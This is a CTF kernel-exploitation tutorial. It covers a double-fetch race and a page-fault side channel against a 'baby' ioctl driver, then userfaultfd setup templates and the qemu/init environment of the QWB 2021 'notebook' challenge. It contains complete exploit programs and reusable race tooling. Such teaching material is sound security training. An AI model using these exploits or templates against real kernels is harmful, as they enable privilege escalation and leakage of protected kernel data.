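static bool chk_range_not_ok(unsigned long addr, unsigned long size, unsigned long limit)
{
    unsigned long end = addr + size;
    if (end < size)
        return true;
    return end > limit;
}

/* Layout of the structure passed to ioctl(fd, 0x1337, &arg). */
struct baby_arg {
    unsigned long flag_addr;
    unsigned long flag_len;
};

/* True if an argument stored at arg_addr with contents *arg passes all three checks. */
static bool baby_checks_pass(unsigned long arg_addr, const struct baby_arg *arg, size_t real_flag_len)
{
    return !chk_range_not_ok(arg_addr, sizeof(*arg), USER_LIMIT)          /* check 1 */
        && !chk_range_not_ok(arg->flag_addr, arg->flag_len, USER_LIMIT)   /* check 2 */
        && arg->flag_len == real_flag_len;                                /* check 3 */
}
```

A user buffer of the right length passes, while the same structure holding a kernel address, or a wrong length, is rejected.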

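Once the checks pass, the module compares the data in our buffer with the flag byte by byte; if every byte matches, it prints the flag to the kernel log.
The techniques used on this example are covered below.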

1. Double fetch

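Double fetch means the kernel fetches the same user-space data twice. Between the moment the kernel checks our data and the moment it starts comparing there is a window that is negligible to a human but not to a program. We exploit that window: right after our pointer passes the check, a second thread changes it to point at the real flag, so the comparison reads the kernel flag and effectively compares the flag with itself, bypassing the check. a3 illustrates this with a diagram.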
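The window can be modeled deterministically in user space. In this sketch the "kernel" reads `flag_addr` once to validate it and again to use it, and a callback run between the two reads stands in for the racing thread. `double_fetch_model`, `swap_to_kernel`, the `USER_LIMIT` value and the kernel address are all assumptions for illustration, not code from the challenge.

```c
#include <stddef.h>

#define USER_LIMIT 0x7ffffffff000UL   /* assumed user address limit (x86-64, 4-level paging) */

/* "User" memory holding the ioctl argument; flag_addr may change at any time. */
struct fetch_arg {
    volatile unsigned long flag_addr;
    unsigned long flag_len;
};

/* Models baby_ioctl's double fetch: fetch #1 is range-checked, fetch #2 is
 * used for the comparison. `between` runs in the window between the two
 * fetches and plays the racing thread. Returns the address the comparison
 * would read from, or 0 if the check rejects the argument. */
unsigned long double_fetch_model(struct fetch_arg *arg, void (*between)(struct fetch_arg *))
{
    unsigned long checked = arg->flag_addr;          /* fetch #1: validated */
    unsigned long end = checked + arg->flag_len;
    if (end < checked || end > USER_LIMIT)
        return 0;                                    /* the handler would return 14 */
    if (between != NULL)
        between(arg);                                /* the race window */
    return arg->flag_addr;                           /* fetch #2: never re-validated */
}

/* Stand-in for the racing thread; the kernel address is made up. */
void swap_to_kernel(struct fetch_arg *arg)
{
    arg->flag_addr = 0xffffffffc0002028UL;
}
```

Without interference the comparison uses the checked user address; with the swap in the window it uses the kernel address that would have been rejected if passed directly.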

Note that when using the pthread family of functions you need to add -lpthread to the compile options.
Our exp is as follows:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/types.h>


#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, (void *)(x))

pthread_t compete_thread;
char buf[0x30] = "peiwithhao";      /* legal user-space buffer that passes the checks */
int competition_time = 0x1000;
volatile int status = 1;            /* shared by both threads; volatile so the loops re-read it */
unsigned long real_addr;            /* kernel address of the flag, leaked via cmd 0x6666 */


/* argument structure passed to ioctl(0x1337) */
struct{
    void * volatile flag_addr;      /* the field we race on */
    size_t flag_len;                /* must equal strlen(flag), i.e. 33 */
}flag = {.flag_addr = buf, .flag_len = 33};

/* racing thread: keeps pointing flag_addr at the kernel flag, hoping to land
 * between the range check and the byte-by-byte comparison */
void* competition_thread(void *arg){
    (void)arg;
    while(status){
        for(int i = 0; i < competition_time; i++){
            flag.flag_addr = (void *)real_addr;
        }
    }
    return NULL;
}

void info_log(char* str){
    printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
    printf("\033[0m\033[1;31m%s\033[0m\n",str);
    exit(1);
}

int main(void){
    int fd = open("/dev/baby", O_RDWR);
    if(fd < 0)
        error_log("Open /dev/baby failed!");

    /* cmd 0x6666 prints the flag address to the kernel log */
    ioctl(fd, 0x6666);
    system("dmesg | grep flag > /addr.txt");
    int addr_fd = open("/addr.txt", O_RDONLY);
    /* skip "[    x.xxxxxx] Your flag is at " (31 bytes) */
    lseek(addr_fd, 31, SEEK_SET);
    char addr_str[0x11] = {0};
    if(read(addr_fd, addr_str, 0x10) <= 0)
        error_log("Read the flag address failed!");
    close(addr_fd);
    sscanf(addr_str, "%lx", &real_addr);
    PRINT_ADDR("flag", real_addr);

    char* temp = (char*)calloc(1, 0x1001);
    pthread_create(&compete_thread, NULL, competition_thread, NULL);
    while(status){
        for(int i = 0; i < competition_time; i++){
            flag.flag_addr = buf;           /* reset to the legal buffer before each call */
            ioctl(fd, 0x1337, &flag);
        }
        system("dmesg | grep flag > /result.txt");
        int result_fd = open("/result.txt", O_RDONLY);
        ssize_t n = read(result_fd, temp, 0x1000);
        close(result_fd);                   /* avoid leaking one fd per round */
        temp[n > 0 ? n : 0] = '\0';
        if(strstr(temp, "flag{")){
            status = 0;
        }
    }
    pthread_join(compete_thread, NULL);
    info_log("finish");
    system("dmesg | grep flag");
    return 0;
}
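The exp reads the address at a fixed offset of 31 bytes: the 15-character timestamp prefix "[    x.xxxxxx] " plus the 16-character "Your flag is at ". That offset breaks if the timestamp field widens (e.g. after 99999 seconds of uptime) or if timestamps are disabled. A slightly more robust sketch searches for the "is at " marker instead; `parse_flag_addr` is a hypothetical helper, not part of the original exp.

```c
#include <stdlib.h>
#include <string.h>

/* Extract the address printed by
 *     printk("Your flag is at %px! ...", flag)
 * from one dmesg line. Returns 0 on success, -1 if no address is found. */
int parse_flag_addr(const char *line, unsigned long *out)
{
    const char *marker = "is at ";
    const char *p = strstr(line, marker);
    char *end;

    if (p == NULL)
        return -1;
    p += strlen(marker);
    unsigned long v = strtoul(p, &end, 16);   /* stops at the '!' after the hex digits */
    if (end == p)
        return -1;                            /* no hex digits after the marker */
    *out = v;
    return 0;
}
```

In the exp one would read the whole of /addr.txt into a buffer and call `parse_flag_addr(buffer, &real_addr)` in place of the `lseek`/`sscanf` pair.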

2. Side channel

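As the name suggests, a side-channel attack departs completely from the normal way of solving the problem, somewhat like a hardware hacker would; some side-channel attacks even infer what a program is doing from differences in running time, for example during encryption or decryption checks. This challenge also admits a side-channel solution.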

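As we saw above, we only get the flag if we pass in the correct flag value, but the check compares one byte at a time. That suggests the following approach:

  1. Each time, pass in a candidate flag and brute-force it one character at a time.
  2. Telling a correct guess apart is simple. If a character is wrong, the ioctl returns normally. To detect a correct one, mmap a page and place the partial guess at the very end of it. If the last guessed character matches, the kernel goes on to compare the next byte, which lies on the next page; that page is most likely unmapped, so the access faults inside the kernel and most likely ends in a panic.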
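The oracle can be reproduced entirely in user space to see why it works. In this sketch a SIGSEGV handler plays the role of the kernel oops, and a second page is mapped and then unmapped so the byte after the guess is guaranteed to be unmapped. `probe` and the secret strings are hypothetical; in the real challenge each probe is one run of the exp, and a panic means the guess was right.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

static sigjmp_buf probe_env;

/* SIGSEGV handler: the comparison ran into the guard page. */
static void on_segv(int sig)
{
    (void)sig;
    siglongjmp(probe_env, 1);
}

/* User-space stand-in for the kernel's byte-by-byte comparison against
 * `secret`. The guess is copied to the very end of a page whose successor
 * is unmapped. Returns 1 if every guessed byte matched (the loop either
 * faulted on the guard page or matched the whole secret), 0 on a mismatch,
 * -1 if the mapping could not be set up. */
int probe(const char *secret, const char *guess)
{
    long page = sysconf(_SC_PAGESIZE);
    size_t glen = strlen(guess);
    size_t slen = strlen(secret);
    if (glen > (size_t)page)
        return -1;

    char *map = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map == MAP_FAILED)
        return -1;
    munmap(map + page, page);                 /* guard page */

    char *buf = map + page - glen;            /* guess ends at the page boundary */
    memcpy(buf, guess, glen);

    struct sigaction sa, old;
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    volatile int result = 0;
    if (sigsetjmp(probe_env, 1) == 0) {
        size_t i = 0;
        /* like: for (i = 0; i < strlen(flag); ++i) if (buf[i] != flag[i]) return 22; */
        while (i < slen && ((volatile char *)buf)[i] == secret[i])
            i++;
        result = (i == slen);
    } else {
        result = 1;                           /* faulted: all guessed bytes matched */
    }

    sigaction(SIGSEGV, &old, NULL);
    munmap(map, page);
    return result;
}
```

A brute-force driver then extends a known prefix one character at a time, keeping the candidate for which `probe` reports a match.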

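The resulting layout: the guess ends exactly at the page boundary, so the byte after the last guessed character lies on the next, unmapped page.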

The exp below takes the guess as a command-line argument:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

/* argument structure passed to ioctl(0x1337) */
struct{
    void* flag_addr;
    size_t flag_len;
}flag = {.flag_len = 33};           /* must equal strlen(flag) to pass check 3 */

void error_log(char* str){
    printf("\033[0m\033[1;31m%s\033[0m\n",str);
    exit(1);
}

int main(int argc, char** argv){
    if(argc < 2){
        error_log("Usage: ./exp <flag>");
    }
    int fd = open("/dev/baby", O_RDWR);
    if(fd < 0){
        error_log("Open /dev/baby failed!");
    }
    size_t guess_len = strlen(argv[1]);
    /* map two pages and unmap the second, so the byte right after
     * the guess is guaranteed to be unmapped */
    char *buf = (char *)mmap(NULL, 0x2000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    if(buf == MAP_FAILED){
        error_log("mmap failed!");
    }
    munmap(buf + 0x1000, 0x1000);
    /* place the guess at the very end of the first page */
    char *guess_addr = buf + 0x1000 - guess_len;
    memcpy(guess_addr, argv[1], guess_len);
    flag.flag_addr = guess_addr;
    /* wrong guess: the handler returns 22 and ioctl() passes it back;
     * correct guess: the kernel reads past the page boundary and faults */
    long ret = ioctl(fd, 0x1337, &flag);
    printf("ioctl returned %ld\n", ret);
    close(fd);
    return 0;
}

Example: QWB (Qiangwang Cup) 2021 online round - notebook

1. userfaultfd basics

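This technique lets user space handle events that the kernel would normally handle itself, such as page faults.
The userfaultfd mechanism makes user-controlled page-fault handling possible: a process can define a page-fault handler in user space for its own memory. This adds flexibility, but, much like FUSE compared with in-kernel file systems (a deeper call chain), it can cost performance.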

It is provided as a system call; its man page reads:

SYNOPSIS
#include <sys/types.h>
#include <linux/userfaultfd.h>

int userfaultfd(int flags);

Note: There is no glibc wrapper for this system call; see NOTES.

DESCRIPTION
userfaultfd() creates a new userfaultfd object that can be used for delegation of page-fault handling to a user-space application, and returns a file descriptor that refers to the new object. The new userfaultfd object is configured using ioctl(2).

Once the userfaultfd object is configured, the application can use read(2) to receive userfaultfd notifications. The reads from userfaultfd may be blocking or non-blocking, depending on the value of flags used for
the creation of the userfaultfd or subsequent calls to fcntl(2).

The following values may be bitwise ORed in flags to change the behavior of userfaultfd():

O_CLOEXEC
Enable the close-on-exec flag for the new userfaultfd file descriptor. See the description of the O_CLOEXEC flag in open(2).

O_NONBLOCK
Enables non-blocking operation for the userfaultfd object. See the description of the O_NONBLOCK flag in open(2).

When the last file descriptor referring to a userfaultfd object is closed, all memory ranges that were registered with the object are unregistered and unread events are flushed.

Usage
The userfaultfd mechanism is designed to allow a thread in a multithreaded program to perform user-space paging for the other threads in the process. When a page fault occurs for one of the regions registered to the
userfaultfd object, the faulting thread is put to sleep and an event is generated that can be read via the userfaultfd file descriptor. The fault-handling thread reads events from this file descriptor and services
them using the operations described in ioctl_userfaultfd(2). When servicing the page fault events, the fault-handling thread can trigger a wake-up for the sleeping thread.

It is possible for the faulting threads and the fault-handling threads to run in the context of different processes. In this case, these threads may belong to different programs, and the program that executes the
faulting threads will not necessarily cooperate with the program that handles the page faults. In such non-cooperative mode, the process that monitors userfaultfd and handles page faults needs to be aware of the
changes in the virtual memory layout of the faulting process to avoid memory corruption.

Starting from Linux 4.11, userfaultfd can also notify the fault-handling threads about changes in the virtual memory layout of the faulting process. In addition, if the faulting process invokes fork(2), the userfaultfd objects associated with the parent may be duplicated into the child process and the userfaultfd monitor will be notified (via the UFFD_EVENT_FORK described below) about the file descriptor associated with the userfault objects created for the child process, which allows the userfaultfd monitor to perform user-space paging for the child process. Unlike page faults which have to be synchronous and require an explicit or implicit wakeup, all other events are delivered asynchronously and the non-cooperative process resumes execution as soon as the userfaultfd manager executes read(2). The userfaultfd manager should carefully synchronize calls to UFFDIO_COPY with the processing of events.

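In short, userfaultfd() creates an object for handling page faults in user space and returns a file descriptor referring to it. The object is configured with ioctl; once it is configured, we can read userfaultfd messages from it with read(). Whether that read blocks depends on the flags used when the object was created (O_NONBLOCK) or on later fcntl(2) calls.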

To use it, we first need such an object, created as follows:

long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

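With the object in hand, we use ioctl for the rest: configuring it, registering memory ranges and servicing faults. The relevant ioctl commands are:

  • UFFDIO_API: the API handshake; it must be issued before any other userfaultfd ioctl.
  • UFFDIO_REGISTER: register a range to be monitored.
  • UFFDIO_COPY: after a fault occurs in that range, copy our own data to the faulting address (this also wakes the faulting thread).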

Next, mmap an anonymous region to serve as the monitored range and register it with ioctl:

// Registration passes its parameters in a struct uffdio_register:
// struct uffdio_range {
// __u64 start; /* Start of range */
// __u64 len; /* Length of range (bytes) */
// };
//
// struct uffdio_register {
// struct uffdio_range range;
// __u64 mode; /* Desired mode of operation (input) */
// __u64 ioctls; /* Available ioctl() operations (output) */
// };

/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */


addr = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
// addr and len are the address and length of our anonymous mapping; store them in uffdio_register
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
// mode: older kernels support only UFFDIO_REGISTER_MODE_MISSING (faults on not-yet-present pages)
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
// register the range with the UFFDIO_REGISTER ioctl
ioctl(uffd, UFFDIO_REGISTER, &uffdio_register);

Then we start a thread that polls the userfaultfd to catch faults on our page:

// in the main thread, call pthread_create to spawn the fault-handler thread
pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);

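Below is an example of a custom thread function. It handles an ordinary anonymous-page fault in user space: it copies the contents of an existing page-sized buffer to the faulting address. It polls the uffd with poll() and services each UFFD_EVENT_PAGEFAULT event it receives with a copy (the UFFDIO_COPY ioctl).

(The paragraph above is quoted from Jcix; I will remove it on request.)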

Here is our fault_handler_thread:

static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) arg;

/* Create a page that will be copied into the faulting region */

if (page == NULL) {
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}

/* Loop, handling incoming events on the userfaultfd
file descriptor */

for (;;) {

/* See what poll() tells us about the userfaultfd */

struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");

printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);

/* Read an event from the userfaultfd */

nread = read(uffd, &msg, sizeof(msg));
if (nread == 0) {
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}

if (nread == -1)
errExit("read");

/* We expect only one kind of event; verify that assumption */

if (msg.event != UFFD_EVENT_PAGEFAULT) {
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}

/* Display info about the page-fault event */

printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);

/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */

memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;

uffdio_copy.src = (unsigned long) page;

/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */

uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");

printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}


The complete test program from the man page:

/* userfaultfd_demo.c

Licensed under the GNU General Public License version 2 or later.
*/
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>

#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)

static int page_size;

static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) arg;

/* Create a page that will be copied into the faulting region */

if (page == NULL) {
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}

/* Loop, handling incoming events on the userfaultfd
file descriptor */

for (;;) {

/* See what poll() tells us about the userfaultfd */

struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");

printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);

/* Read an event from the userfaultfd */

nread = read(uffd, &msg, sizeof(msg));
if (nread == 0) {
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}

if (nread == -1)
errExit("read");

/* We expect only one kind of event; verify that assumption */

if (msg.event != UFFD_EVENT_PAGEFAULT) {
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}

/* Display info about the page-fault event */

printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);

/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */

memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;

uffdio_copy.src = (unsigned long) page;

/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */

uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");

printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}

int
main(int argc, char *argv[])
{
long uffd; /* userfaultfd file descriptor */
char *addr; /* Start of region handled by userfaultfd */
unsigned long len; /* Length of region handled by userfaultfd */
pthread_t thr; /* ID of thread that handles page faults */
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

if (argc != 2) {
fprintf(stderr, "Usage: %s num-pages\n", argv[0]);
exit(EXIT_FAILURE);
}

page_size = sysconf(_SC_PAGE_SIZE);
len = strtoul(argv[1], NULL, 0) * page_size;

/* Create and enable userfaultfd object */

uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");

/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */

addr = mmap(NULL, len, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
errExit("mmap");

printf("Address returned by mmap() = %p\n", addr);

/* Register the memory range of the mapping we just created for
handling by the userfaultfd object. In mode, we request to track
missing pages (i.e., pages that have not yet been faulted in). */

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");

/* Create a thread that will process the userfaultfd events */

s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
if (s != 0) {
errno = s;
errExit("pthread_create");
}

/* Main thread now touches memory in the mapping, touching
locations 1024 bytes apart. This will trigger userfaultfd
events for all pages in the region. */

int l;
l = 0xf; /* Ensure that faulting address is not on a page
boundary, in order to test that we correctly
handle that case in fault_handling_thread() */
while (l < len) {
char c = addr[l];
printf("Read address %p in main(): ", addr + l);
printf("%c\n", c);
l += 1024;
usleep(100000); /* Slow things down a little */
}

exit(EXIT_SUCCESS);
}

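Running it: the first read of the address returned by mmap triggers a page fault. The polling thread sees a fault in the range we registered, fills its page with 'A' and copies it in with UFFDIO_COPY, which lets the faulting thread continue. So after our user-space fault handling, the first page reads back as all 'A' (each later fault uses the next letter: 'B', 'C', and so on).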
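The output of the demo can be predicted with a little arithmetic. Assuming 4 KiB pages, main() touches each page four times (offsets 0xf, 0x40f, 0x80f, 0xc0f within it), but only the first touch faults, because after UFFDIO_COPY the page is present. So `./userfaultfd_demo 2` should print 'A' four times, then 'B' four times. This sketch models that; `demo_char_at` and `fault_dst` are hypothetical helpers, and the model assumes pages are touched in increasing order so the n-th fault hits page n.

```c
#include <stddef.h>

/* Models the man-page demo: main() reads addr[0xf + k * 1024] for k = 0, 1, ...
 * and the handler fills the n-th faulting page with 'A' + n % 20. */
char demo_char_at(size_t k, size_t page_size)
{
    size_t offset = 0xf + k * 1024;           /* offset read by the k-th touch */
    size_t page_idx = offset / page_size;     /* page of the mapping it falls in */
    return (char)('A' + page_idx % 20);       /* fault_cnt == page_idx when that page faulted */
}

/* The handler rounds the faulting address down to a page boundary for UFFDIO_COPY. */
unsigned long fault_dst(unsigned long fault_addr, unsigned long page_size)
{
    return fault_addr & ~(page_size - 1);
}
```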

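As you can see, using it is quite tedious, so let's write a reusable userfaultfd template; then we will not have to recall all these variable names when solving a challenge: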

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>

#define errExit(msg) do{ perror(msg); exit(EXIT_FAILURE); \
} while(0)

static int page_size;

/* Register [addr, addr + len) with a new userfaultfd and run `handler`
 * in a new thread, passing it the uffd. Returns the uffd. */
long userfaultfd_attack(char* addr, unsigned long len, void *(*handler)(void *)){
    long uffd;
    pthread_t thr;
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    int s;

    /* the handler uses page_size for UFFDIO_COPY, so make sure it is set */
    if(page_size == 0)
        page_size = sysconf(_SC_PAGE_SIZE);

    /* Create and enable userfaultfd object */
    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if(uffd == -1)
        errExit("userfaultfd");

    /* API handshake, required before any other uffd ioctl */
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
        errExit("ioctl-UFFDIO_API");

    /* Watch the range for missing-page faults */
    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
        errExit("ioctl-UFFDIO_REGISTER");

    /* Create a thread that will process the userfaultfd events */
    s = pthread_create(&thr, NULL, handler, (void *)uffd);
    if(s != 0){
        errno = s;
        errExit("pthread_create");
    }
    return uffd;
}

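With the code above, a single call to userfaultfd_attack(addr, len, handler) replaces the whole series of setup steps. What remains is the important part, writing the handler, which you will mostly have to work out yourself during a contest. Here is a fairly generic template, adapted from the Linux man page: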

static char* page; /* page-sized buffer copied into the faulting page; allocate and fill it before the fault */

static void* fault_handler_thread(void * arg){
static struct uffd_msg msg; /* data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long)arg;

/* Loop, handling incoming events on the userfaultfd file descriptor */
for(;;){
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if(nready == -1)
errExit("poll");

/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if(nread == 0){
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if(nread == -1)
errExit("read");

/* We expect only one kind of event; verify that assumption */
if(msg.event != UFFD_EVENT_PAGEFAULT){
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}

/* copy things to the addr */

uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
* So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1);

uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
}
}


2. Reversing the challenge

First, the startup script:

qemu-system-x86_64 -m 64M \
-kernel bzImage \
-initrd rootfs.cpio \
-append "loglevel=0 console=ttyS0 oops=panic panic=1 kaslr" \
-nographic \
-net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \
-monitor /dev/null 2>/dev/null -s \
-no-reboot

  1. 2 cores with 2 threads each (-smp cores=2,threads=2)
  2. KASLR enabled
  3. SMEP/SMAP enabled
  4. KPTI enabled
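Inside the guest, the SMEP/SMAP part of this list can be double-checked against the flags line of /proc/cpuinfo. This is a minimal token-matching sketch; `has_cpu_flag` is a hypothetical helper. Whole-token matching matters because one flag name can be a prefix of another.

```c
#include <stdbool.h>
#include <string.h>

/* True if `flag` appears as a whole, space-separated token
 * in a /proc/cpuinfo "flags" line. */
bool has_cpu_flag(const char *flags_line, const char *flag)
{
    size_t n = strlen(flag);
    const char *p = flags_line;

    if (n == 0)
        return false;
    while ((p = strstr(p, flag)) != NULL) {
        bool start_ok = (p == flags_line) || p[-1] == ' ' || p[-1] == '\t' || p[-1] == ':';
        bool end_ok = p[n] == '\0' || p[n] == ' ' || p[n] == '\n';
        if (start_ok && end_ok)
            return true;
        p++;                                  /* keep searching after this partial hit */
    }
    return false;
}
```

In the guest one would feed it the line starting with "flags" from /proc/cpuinfo.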

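:disappointed: Pretty hopeless; it feels like the first time in userland you see checksec light up all green with every protection on. Next, the init script in the file system: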

#!/bin/sh
/bin/mount -t devtmpfs devtmpfs /dev
chown root:tty /dev/console
chown root:tty /dev/ptmx
chown root:tty /dev/tty
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts

mount -t proc proc /proc
mount -t sysfs sysfs /sys

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

ifup eth0 > /dev/null 2>/dev/null

chown root:root /flag
chmod 600 /flag

insmod notebook.ko
cat /proc/modules | grep notebook > /tmp/moduleaddr
chmod 777 /tmp/moduleaddr
chmod 777 /dev/notebook
#poweroff -d 300 -f &
echo "Welcome to QWB!"

#sh
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys

poweroff -d 1 -n -f

It inserts a notebook.ko module. Let's boot the kernel and look at the basics:

/ $ uname -a
Linux (none) 4.15.8 #3 SMP Thu Jun 3 01:01:56 PDT 2021 x86_64 GNU/Linux
/ $ lsmod
Module Size Used by Tainted: G
notebook 16384 0
/ $ dmesg
dmesg: klogctl: Operation not permitted
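Besides this, the init script copies the notebook line of /proc/modules (as root) into the world-readable /tmp/moduleaddr, which hands us the module's load address; with kptr_restrict set to 1, an unprivileged read of /proc/modules itself would be expected to show a zeroed address. A /proc/modules line holds the name, size, reference count, dependencies, state and load address, optionally followed by taint flags. This sketch extracts the address; `parse_module_base` is a hypothetical helper.

```c
#include <stdio.h>

/* Pull the load address out of one /proc/modules line, e.g.
 *     "notebook 16384 0 - Live 0xffffffffc0002000 (OE)"
 * Fields: name, size, refcount, dependencies, state, address[, taint].
 * Returns 0 on success, -1 if the line has no address field. */
int parse_module_base(const char *line, unsigned long *base)
{
    return sscanf(line, "%*s %*s %*s %*s %*s %lx", base) == 1 ? 0 : -1;
}
```

In the exp one would fgets() the single line from /tmp/moduleaddr and pass it in.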

Comfortingly, the kernel version (4.15.8) is not very new :happy:. Now let's decompile notebook.ko in IDA:

.rodata:0000000000000800                               ; ===========================================================================
.rodata:0000000000000800
